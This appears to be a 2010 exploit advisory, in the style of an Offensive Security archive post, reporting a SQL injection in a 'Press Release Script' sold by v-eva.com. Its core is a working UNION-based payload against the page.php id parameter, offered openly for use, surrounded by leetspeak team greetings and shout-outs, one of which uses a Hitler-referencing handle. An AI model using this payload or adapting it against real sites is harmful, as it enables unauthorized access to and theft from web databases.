######################{In The Name Of Allah The Mercifull} ###################### [~] Tybe: SQL Injection Vulnerabilities [~] Vendor: www.v-eva.com [+] Software: Press Release Script [+] author: ((R3d-D3v!L)) [~] [+] TEAM: ArAB!AN !NFORMAT!ON SeCuR!TY ---->((4.!.5)) [~] [?] contact: X[at]hotmail.co.jp [-] [?] Date: 14.Jan.2010 [?] T!ME: 05:15 am GMT [?] Home: © Offensive Security [?] ====================================================================================== # SQL Injection # (page.php id) ====================================================================================== [*] Err0r C0N50L3:{EV!L EXPLO!T} [*] {EV!L EXPLO!T} page.php?id=-4+union+all+select+1,@@version,3,4-- [~]-----------------------------{((MAGOUSH-87))}------------------------------------------------# # [~] Greetz tO: [dolly &MERNA &DEV!L_MODY &po!S!ON Sc0rp!0N &JASM!N &MARWA & mAG0ush-1987] # # [~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # # [~] spechial thanks : ((HITLER JEDDAH & S!R TOTT! & DR.DAShER)) # # [?]spechial SupP0RT : MY M!ND # © Offensive Security # # [?]4r48!4n.!nforma7!0N.53cur!7y ---> ((r3d D3v!L<--M2Z--->JUPA<---aNd--->Devil ro0t)) # # [~]spechial FR!ND: 0r45hy # # [~] !'M 4R48!4N 3XPL0!73R. # # [~]{[(D!R 4ll 0R D!E)]}; # # [~]--------------------------------------------------------------------------------------------- _________________________________________________________________ Hotmail: Trusted email with powerful SPAM protection. https://signup.live.com/signup.aspx?id=60969